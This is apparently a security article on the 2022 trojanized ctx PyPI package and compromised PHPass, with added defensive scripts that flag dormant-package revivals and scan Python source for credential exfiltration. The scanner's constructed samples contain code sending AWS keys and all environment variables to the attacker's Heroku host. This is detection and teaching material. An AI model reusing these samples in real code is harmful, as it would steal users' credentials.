A popular Python module, ctx, distributed through the PyPI repository of Python software libraries, has been compromised in what appears to be yet another software supply chain attack.
ctx is a small package that lets you access dictionary items using dot notation; it sees about 22,000 downloads per week. Despite that popularity, the legitimate package had not been updated on PyPI since December 19, 2014. On and after May 14, 2022, however, new versions were uploaded that contained an "extra feature" designed to steal secrets such as AWS access keys and other credentials. The stolen data was sent to a Heroku-hosted endpoint at anti-theft-web.herokuapp[.]com.
The investigation revealed that the original maintainer's domain name had expired and that the attacker registered it on May 14, 2022. Control of that domain lets an attacker create a mailbox at the maintainer's old e-mail address, request a PyPI password reset delivered to that address, take over the account, remove the original package and upload trojanized versions in its place.
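The takeover above left one visible trace before any code was analysed: a package that had been silent for more than seven years suddenly published new releases. The following check, an added example that is not code from the article or from the ctx project, walks a package's release history in the shape returned by PyPI's JSON API, reports the longest dormancy gap and lists every version published after it, so a pinned version can be compared against that list. The release data is constructed from the dates in the text (the "0.1.1" last legitimate version and the exact upload times are placeholders, as is the three-year dormancy threshold).

```python
"""Flag a package whose release history shows years of silence followed by a
burst of new uploads, the pattern described for ctx (last upload 2014-12-19,
trojanized versions from 2022-05-14). Added example, not from the article or
the ctx project; release data is constructed from the dates in the text."""
from datetime import datetime, timedelta

# Shape follows PyPI's JSON API (https://pypi.org/pypi/<name>/json): a
# "releases" mapping of version -> list of files, each with an "upload_time".
# Constructed: the three malicious versions and the two dates come from the
# article; "0.1.1" as the last legitimate version and the clock times are
# placeholders.
CTX_RELEASES = {
    "0.1.1": [{"upload_time": "2014-12-19T10:00:00"}],
    "0.1.2": [{"upload_time": "2022-05-14T17:00:00"}],
    "0.2.2": [{"upload_time": "2022-05-15T12:00:00"}],
    "0.2.6": [{"upload_time": "2022-05-21T09:00:00"}],
}

DEFAULT_DORMANCY = timedelta(days=3 * 365)  # assumption; tune per ecosystem


def release_timeline(releases):
    """(version, first upload datetime) pairs in upload order. Versions whose
    files were all deleted have an empty list and no date, so they are skipped."""
    timeline = []
    for version, files in releases.items():
        if files:
            first = min(datetime.fromisoformat(f["upload_time"]) for f in files)
            timeline.append((version, first))
    return sorted(timeline, key=lambda item: item[1])


def find_revival(releases, dormancy=DEFAULT_DORMANCY):
    """Return (last_version_before_gap, first_version_after_gap, gap) for the
    longest silence of at least `dormancy`, or None when the package never
    went quiet that long."""
    timeline = release_timeline(releases)
    worst = None
    for (v_old, t_old), (v_new, t_new) in zip(timeline, timeline[1:]):
        gap = t_new - t_old
        if gap >= dormancy and (worst is None or gap > worst[2]):
            worst = (v_old, v_new, gap)
    return worst


def versions_after_revival(releases, dormancy=DEFAULT_DORMANCY):
    """Every version published from the revival onward: the set to compare a
    lockfile pin against before trusting the package again."""
    revival = find_revival(releases, dormancy)
    if revival is None:
        return []
    _, first_new, _ = revival
    timeline = release_timeline(releases)
    start = next(i for i, (v, _) in enumerate(timeline) if v == first_new)
    return [v for v, _ in timeline[start:]]


def pinned_version_is_suspect(releases, pinned, dormancy=DEFAULT_DORMANCY):
    """True if the version a project pins was uploaded after a long dormancy."""
    return pinned in versions_after_revival(releases, dormancy)


if __name__ == "__main__":
    old, new, gap = find_revival(CTX_RELEASES)
    print(f"ctx: {gap.days} days of silence between {old} and {new}; "
          f"post-revival versions: {versions_after_revival(CTX_RELEASES)}")
```

A revival is only a signal, not proof of compromise; it is the prompt to look at who now controls the account, whether the maintainer's e-mail domain is still theirs, and whether the new release contains anything the old one did not.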
The attackers uploaded three backdoored versions of ctx: 0.1.2, 0.2.2 and 0.2.6. The "new" 0.1.2 contained code that, every time a ctx dictionary object is created, reads the AWS access key ID, the AWS secret access key and the computer name and sends them to the attacker's endpoint. In ctx 0.2.6 the attacker went further and collected all environment variables.
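The backdoor described above has a recognisable static shape: a function reads the environment, the same function (or one it calls) hands the data to an HTTP client, and the whole thing hangs off the class constructor so it fires on ordinary use. The scanner below, an added example that is not code from the article or from the ctx project, looks for exactly that pattern in Python source using the `ast` module and can be pointed at a site-packages directory. The three source samples are constructed to resemble the 0.1.2 and 0.2.6 behaviour as the article describes it; they are parsed, never executed, and the only real identifier in them is the exfiltration hostname the article names. The module and function vocabulary it matches on is an assumption to be extended for your own codebase.

```python
"""Static check for the behaviour attributed to the trojanized ctx releases:
code that reads credentials from the environment and hands them to an HTTP
client, wired into an innocuous entry point such as a class constructor.
Added example, not code from the article or the ctx project. The samples
are constructed and are only parsed, never run. Variable-name extraction
from os.environ[...] relies on the Python 3.9+ ast.Subscript layout."""
import ast
from pathlib import Path

# Constructed sample: what a benign dot-access dictionary looks like.
BENIGN_SRC = '''
class Ctx(dict):
    def __getattr__(self, name):
        try:
            return self[name]
        except KeyError:
            raise AttributeError(name)
'''

# Constructed sample mirroring the ctx 0.1.2 description: AWS key ID, secret
# key and hostname gathered in a helper that __init__ calls on every object
# creation, then sent to the exfiltration endpoint named in the article.
TROJAN_SRC = '''
import os, socket, requests

class Ctx(dict):
    def __init__(self, *a, **kw):
        super().__init__(*a, **kw)
        self.sendRequest()

    def sendRequest(self):
        payload = {
            "key": os.environ.get("AWS_ACCESS_KEY_ID"),
            "secret": os.environ["AWS_SECRET_ACCESS_KEY"],
            "host": socket.gethostname(),
        }
        requests.get("https://anti-theft-web.herokuapp.com/hacked/", params=payload)
'''

# Constructed sample mirroring the ctx 0.2.6 description: the whole environment.
TROJAN_ALL_ENV_SRC = '''
import os, requests

class Ctx(dict):
    def __init__(self, *a, **kw):
        super().__init__(*a, **kw)
        requests.post("https://anti-theft-web.herokuapp.com/hacked/", json=dict(os.environ))
'''

# Heuristic vocabulary (an assumption; extend for your codebase). Raw sockets,
# subprocess-based exfiltration and obfuscated imports need their own rules.
NET_MODULES = {"requests", "urllib", "http", "httpx", "aiohttp"}
ENV_CALLS = {"os.environ.get", "os.getenv"}


def _dotted(node):
    """Render a Name/Attribute chain such as os.environ.get as a string, or ""
    when the chain does not start at a plain name (e.g. super().__init__)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _str_const(node):
    return node.value if isinstance(node, ast.Constant) and isinstance(node.value, str) else None


def scan_functions(source):
    """Per function: touches the environment? reaches an HTTP client? which
    self.methods does it call? which environment variable names does it read?"""
    report = {}
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        rec = {"env": False, "net": False, "calls": set(), "names": []}
        for node in ast.walk(fn):
            if isinstance(node, ast.Call):
                name = _dotted(node.func)
                if name.startswith("self."):
                    rec["calls"].add(name[len("self."):])
                if name.split(".")[0] in NET_MODULES:
                    rec["net"] = True
                if name in ENV_CALLS:
                    rec["env"] = True
                    rec["names"] += [s for s in map(_str_const, node.args[:1]) if s]
            elif isinstance(node, ast.Attribute) and _dotted(node) == "os.environ":
                rec["env"] = True  # covers dict(os.environ) and os.environ[...]
            elif isinstance(node, ast.Subscript) and _dotted(node.value) == "os.environ":
                key = _str_const(node.slice)
                if key:
                    rec["names"].append(key)
        report[fn.name] = rec
    return report


def find_exfiltration(source):
    """Flag functions that both read the environment and reach an HTTP client,
    and say whether that code runs on object creation (directly in __init__ or
    one self.method() hop away, which is the ctx shape)."""
    report = scan_functions(source)
    flagged = {n for n, r in report.items() if r["env"] and r["net"]}
    init = report.get("__init__")
    on_construction = init is not None and (
        "__init__" in flagged or bool(init["calls"] & flagged))
    names = sorted({s for n in flagged for s in report[n]["names"]})
    return {"exfil": sorted(flagged), "on_construction": on_construction, "env_names": names}


def scan_tree(root):
    """Run the check over every .py file under a directory (e.g. site-packages)
    and return only the files with findings; unparsable files are skipped."""
    hits = {}
    for path in Path(root).rglob("*.py"):
        try:
            result = find_exfiltration(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if result["exfil"]:
            hits[str(path)] = result
    return hits


if __name__ == "__main__":
    for label, src in [("benign", BENIGN_SRC), ("ctx-0.1.2-like", TROJAN_SRC),
                       ("ctx-0.2.6-like", TROJAN_ALL_ENV_SRC)]:
        print(label, find_exfiltration(src))
```

The check is deliberately narrow: it reports where environment reads and HTTP calls meet inside one function, not every use of either, so a legitimate HTTP client that reads a proxy setting from the environment will also show up and has to be triaged by hand. What it cannot see is exfiltration split across unrelated functions, dynamic imports or string-built attribute access, which is why a release-history check and a diff against the last known-good version belong alongside it.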
Security researchers have also found a second compromised library that serves the same purpose of harvesting AWS credentials: PHPass, a portable PHP password hashing framework. A compromised version of PHPass published through the Packagist repository contained the same malicious domain.
Both affected libraries have since been removed from PyPI and GitHub. Removal does not undo the theft, however: anyone who installed one of the trojanized ctx versions or the compromised PHPass should treat their AWS keys, and in the case of ctx 0.2.6 every environment variable on the affected host, as exposed and rotate them.